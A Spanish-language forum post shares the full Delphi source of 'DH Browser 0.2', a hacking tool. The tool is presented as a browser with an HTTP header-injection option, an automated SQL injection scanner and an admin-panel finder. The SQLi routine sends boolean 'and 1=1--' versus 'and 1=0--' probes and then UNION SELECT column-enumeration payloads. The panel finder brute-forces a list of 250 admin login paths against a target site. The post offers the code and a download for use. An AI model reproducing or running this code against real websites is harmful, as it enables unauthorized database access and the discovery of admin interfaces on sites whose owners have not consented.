[Delphi] DH Browser 0.2

Iniciado por BigBear, 15 Noviembre 2013, 15:02 PM

0 Miembros y 1 Visitante están viendo este tema.

BigBear

Un simple browser que hice en Delphi con las siguientes opciones :

  • Podes ver el codigo HTML de la pagina cargada
  • Se puede buscar palabras en el codigo HTML
  • Poder modificar los headers para HTTP header injection
  • Trae un SQLI Scanner para buscar vulnerabilidades SQLI
  • Trae un PanelFinder para buscar el panel del admin

    Unas imagenes :





    El codigo :

    Carga

    Código (delphi) [Seleccionar]

    // DH Browser 0.2
    // (C) Doddy Hackman 2013

    unit dhbrowse;

    interface

    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, StdCtrls, acPNG, ExtCtrls, ComCtrls, acProgressBar, sGroupBox,
      sSkinManager;

    type
      TForm1 = class(TForm)
        sGroupBox1: TsGroupBox;
        sProgressBar1: TsProgressBar;
        Timer1: TTimer;
        Image1: TImage;

        sSkinManager1: TsSkinManager;
        procedure Button1Click(Sender: TObject);
        procedure Timer1Timer(Sender: TObject);
        procedure FormCreate(Sender: TObject);
      private
        { Private declarations }
      public
        { Public declarations }
      end;

    var
      Form1: TForm1;

    implementation

    uses programa;
    {$R *.dfm}

    procedure TForm1.Button1Click(Sender: TObject);
    begin
      Form2.Show;
    end;

    procedure TForm1.FormCreate(Sender: TObject);
    begin
      sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
      sSkinManager1.SkinName := 'tv-b';
      sSkinManager1.Active := True;
    end;

    procedure TForm1.Timer1Timer(Sender: TObject);
    var
      i: integer;
      total: integer;

    begin

      total := 0;
      sProgressBar1.Min := 0;
      sProgressBar1.Max := 100;

      For i := 1 to 100 do
      begin

        Form1.Update;

        Sleep(1000);
        // Sleep(1);

        total := total + 10;

        sProgressBar1.Position := total;

        if (sProgressBar1.Position = 100) then
        begin
          Timer1.Enabled := False;
          Form1.Hide;
          Form2.Show;
          Abort;
        end;
      end;

    end;

    end.

    // The End ?


    Navegador

    Código (delphi) [Seleccionar]

    // DH Browser 0.2
    // (C) Doddy Hackman 2013
    // Credits :
    // Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242
    // FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143
    // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm

    unit programa;

    interface

    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, sSkinManager, StdCtrls, sButton, sEdit, OleCtrls, SHDocVw, sMemo,
      sListBox, sGroupBox, sLabel, sCheckBox, ComCtrls, sStatusBar, acPNG,
      ExtCtrls, mshtml, Menus, PerlRegEx, IdBaseComponent, IdComponent,
      IdTCPConnection, IdTCPClient, IdHTTP, acProgressBar;

    type
      TForm2 = class(TForm)
        sSkinManager1: TsSkinManager;
        sGroupBox1: TsGroupBox;
        sEdit1: TsEdit;
        sButton1: TsButton;
        sGroupBox2: TsGroupBox;
        sMemo1: TsMemo;
        sCheckBox1: TsCheckBox;
        sGroupBox3: TsGroupBox;
        sStatusBar1: TsStatusBar;
        WebBrowser1: TWebBrowser;
        sGroupBox4: TsGroupBox;
        sButton2: TsButton;
        sButton3: TsButton;
        sGroupBox5: TsGroupBox;
        sButton4: TsButton;
        sLabel1: TsLabel;
        Image1: TImage;
        sMemo2: TsMemo;
        PopupMenu1: TPopupMenu;
        S1: TMenuItem;
        S2: TMenuItem;
        IdHTTP1: TIdHTTP;
        PerlRegEx1: TPerlRegEx;
        FindDialog1: TFindDialog;
        sProgressBar1: TsProgressBar;
        procedure sButton1Click(Sender: TObject);
        procedure S1Click(Sender: TObject);
        procedure S2Click(Sender: TObject);
        procedure sButton3Click(Sender: TObject);
        procedure sButton2Click(Sender: TObject);
        procedure sButton4Click(Sender: TObject);
        procedure FindDialog1Find(Sender: TObject);
        procedure FormClose(Sender: TObject; var Action: TCloseAction);
        procedure WebBrowser1ProgressChange(ASender: TObject;
          Progress, ProgressMax: Integer);
        procedure WebBrowser1DownloadComplete(Sender: TObject);
        procedure FormCreate(Sender: TObject);
      private
        { Private declarations }
      public
        { Public declarations }
      end;

    var
      Form2: TForm2;

    implementation

    {$R *.dfm}

    procedure TForm2.FindDialog1Find(Sender: TObject);

    // FindText based on : http://delphi.cjcsoft.net/viewthread.php?tid=47143

    var
      aca: PChar;
      aca2: PChar;
      acatoy: PChar;
      acatoy2: Word;

    begin

      With Sender as TFindDialog do

      begin

        GetMem(aca2, Length(FindText) + 1);
        StrPCopy(aca2, FindText);

        acatoy2 := sMemo2.GetTextLen + 1;
        GetMem(aca, acatoy2);

        sMemo2.GetTextBuf(aca, acatoy2);

        acatoy := aca + sMemo2.SelStart + sMemo2.SelLength;
        acatoy := StrPos(acatoy, aca2);

        if not(acatoy = NIL) then
        begin
          sMemo2.SelStart := acatoy - aca;
          sMemo2.SelLength := Length(FindText);
        end;

        sMemo2.SetFocus;

      end;

    end;

    procedure TForm2.FormClose(Sender: TObject; var Action: TCloseAction);
    begin
      Application.Terminate;
    end;

    procedure TForm2.FormCreate(Sender: TObject);
    begin
      sSkinManager1.SkinDirectory := ExtractFilePath(Application.ExeName) + 'Data';
      sSkinManager1.SkinName := 'tv-b';
      sSkinManager1.Active := True;
    end;

    procedure TForm2.S1Click(Sender: TObject);
    begin
      WebBrowser1.Visible := false;
      sMemo2.Visible := True;
    end;

    procedure TForm2.S2Click(Sender: TObject);
    begin
      WebBrowser1.Visible := True;
      sMemo2.Visible := false;
    end;

    procedure TForm2.sButton1Click(Sender: TObject);

    // Navigate based on : http://www.swissdelphicenter.ch/torry/showcode.php?id=2242

    var

      cabeceras: OLEVariant;
      uno: OLEVariant;
      dos: OLEVariant;
      tres: OLEVariant;

    begin

      uno := navNoReadFromCache or navNoWriteToCache;
      dos := '';
      tres := '';

      if (sCheckBox1.Checked) then
      begin
        cabeceras := sMemo1.Text;
        WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras);
      end
      else
      begin
        cabeceras := '';
        WebBrowser1.Navigate(sEdit1.Text, uno, dos, tres, cabeceras);
      end;
    end;

    procedure TForm2.sButton2Click(Sender: TObject);
    var
      pass1: string;
      pass2: string;
      code: string;
      urltest: string;
      urlgen: string;
      full: string;
      codedos: string;
      i: Integer;

    begin

      sStatusBar1.Panels[0].Text := '[+] SQLI Scanning ...';
      Form2.sStatusBar1.Update;

      pass1 := '+';
      pass2 := '--';

      urltest := 'concat(0x4b30425241,1,0x4b30425241)';

      sStatusBar1.Panels[0].Text := '[+] Checking ...';
      Form2.sStatusBar1.Update;

      code := IdHTTP1.Get
        (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=1' + pass2);

      codedos := IdHTTP1.Get
        (sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass2);

      if not(code = codedos) then
      begin

        sStatusBar1.Panels[0].Text := '[+] Finding columns number';
        Form2.sStatusBar1.Update;

        urltest := '1' + pass1 + 'and' + pass1 + '1=0' + pass1 + 'union' + pass1 +
          'select' + pass1 + 'concat(0x4b30425241,1,0x4b30425241)';
        urlgen := '1';
        for i := 2 to 36 do
        begin
          sStatusBar1.Panels[0].Text := '[+] Columns Length : ' + IntToStr(i);
          Form2.sStatusBar1.Update;
          urltest := urltest + ',concat(0x4b30425241,' + IntToStr(i)
            + ',0x4b30425241)';
          urlgen := urlgen + ',' + IntToStr(i);
          code := IdHTTP1.Get(sEdit1.Text + urltest + pass2);
          PerlRegEx1.Regex := 'K0BRA(.*?)K0BRA';
          PerlRegEx1.Subject := code;

          if PerlRegEx1.Match then
          begin

            urlgen := StringReplace(urlgen, PerlRegEx1.SubExpressions[1],
              'hackman', []);
            full := sEdit1.Text + '1' + pass1 + 'and' + pass1 + '1=0' + pass1 +
              'union' + pass1 + 'select' + pass1 + urlgen;

            sEdit1.Text := full;
            Abort;

          end;
        end;
      end;

      sStatusBar1.Panels[0].Text := '[+] Done';
      Form2.sStatusBar1.Update;

    end;

    procedure TForm2.sButton3Click(Sender: TObject);
    const
      paginas: array [1 .. 250] of string = ('admin/admin.asp', 'admin/login.asp',
        'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx',
        'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx',
        'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp',
        'asp/admin/admin.aspx', 'asp/admin/webmaster.asp',
        'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx',
        'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp',
        'login/index.asp', 'login/index.aspx', 'login/login.asp',
        'login/login.aspx', 'login/admin.asp', 'login/admin.aspx',
        'administracion/index.asp', 'administracion/index.aspx',
        'administracion/login.asp', 'administracion/login.aspx',
        'administracion/webmaster.asp', 'administracion/webmaster.aspx',
        'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/',
        'admin/admin.php', 'admin/index.php', 'admin/login.php',
        'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php',
        'admin/default.php', 'administracion/', 'administracion/index.php',
        'administracion/login.php', 'administracion/ingresar.php',
        'administracion/admin.php', 'administration/', 'administration/index.php',
        'administration/login.php', 'administrator/index.php',
        'administrator/login.php', 'administrator/system.php', 'system/',
        'system/login.php', 'admin.php', 'login.php', 'administrador.php',
        'administration.php', 'administrator.php', 'admin1.html', 'admin1.php',
        'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php',
        'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html',
        'admin/index.html', 'admin/login.html', 'admin/home.php',
        'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html',
        'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/',
        'administrator/index.html', 'administrator/login.html',
        'administrator/account.html', 'administrator/account.php',
        'administrator.html', 'login.html', 'modelsearch/login.php',
        'moderator.php', 'moderator.html', 'moderator/login.php',
        'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html',
        'moderator/', 'account.php', 'account.html', 'controlpanel/',
        'controlpanel.php', 'controlpanel.html', 'admincontrol.php',
        'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp',
        'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp',
        'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp',
        'administrator/index.asp', 'administrator/login.asp',
        'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp',
        'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp',
        'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp',
        'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html',
        'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/',
        'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php',
        'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp',
        'Server/', 'wpadmin/', 'administr8.php', 'administr8.html', 'administr8/',
        'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp',
        'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp',
        'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/',
        'useradmin/', 'sysadmins/', 'admin1/', 'systemadministration/',
        'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/',
        'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/',
        'sysadmin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/',
        'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/',
        'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/',
        'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/',
        'login-redirect/', 'sublogin/', 'wplogin/', 'login1/', 'dirlogin/',
        'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/',
        'loginus/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/',
        'phppgadmin/', 'pureadmin/', 'sqladmin/', 'radmind/', 'openvpnadmin/',
        'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/',
        'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/',
        'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/',
        'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/',
        'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind1/',
        'SuperAdmin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/',
        'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/',
        'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/',
        'system_administration/', 'ss_vms_admin_sm/');
    var
      IdHTTP: TIdHTTP;
      i: Integer;
      control: Integer;
    begin

      control := 0;

      sStatusBar1.Panels[0].Text := '[+] Finding Panel ....';
      Form2.sStatusBar1.Update;

      IdHTTP := TIdHTTP.Create(nil);

      for i := Low(paginas) to High(paginas) do

        if (control = 1) then
        begin
          Abort;
        end
        else
        begin

          try

            sStatusBar1.Panels[0].Text := '[+] Testing : ' + paginas[i];
            Form2.sStatusBar1.Update;

            IdHTTP.Get(sEdit1.Text + '/' + paginas[i]);
            if IdHTTP.ResponseCode = 200 then
            begin

              sStatusBar1.Panels[0].Text := '[+] Done';
              Form2.sStatusBar1.Update;
              sEdit1.Text := sEdit1.Text + '/' + paginas[i];
              control := 1;
            end;
          except
            on E: EIdHttpProtocolException do
              ;
            on E: Exception do
              ;
          end;

        end;

      sStatusBar1.Panels[0].Text := '[+] Done';
      Form2.sStatusBar1.Update;

    end;

    procedure TForm2.sButton4Click(Sender: TObject);
    begin
      FindDialog1.Execute;
    end;

    procedure TForm2.WebBrowser1DownloadComplete(Sender: TObject);
    var
      buscador: IHTMLElement;
    begin

      sProgressBar1.Position := 0;

      // Get HTML based on : http://delphi.about.com/od/adptips2005/qt/webbrowserhtml.htm

      begin

        try
          begin

            sMemo2.Clear;

            buscador := (WebBrowser1.Document AS IHTMLDocument2).body;

            while not(buscador.parentElement = nil) do
            begin
              buscador := buscador.parentElement;
            end;
            sMemo2.Lines.Add(buscador.outerHTML);
          end;
        except
          // ??
        end;
      end;
    end;

    procedure TForm2.WebBrowser1ProgressChange(ASender: TObject;
      Progress, ProgressMax: Integer);
    begin
      sProgressBar1.Max := ProgressMax;
      sProgressBar1.Position := Progress;
    end;

    end.

    // The End ?



    Si lo quieren bajar lo pueden hacer de aca.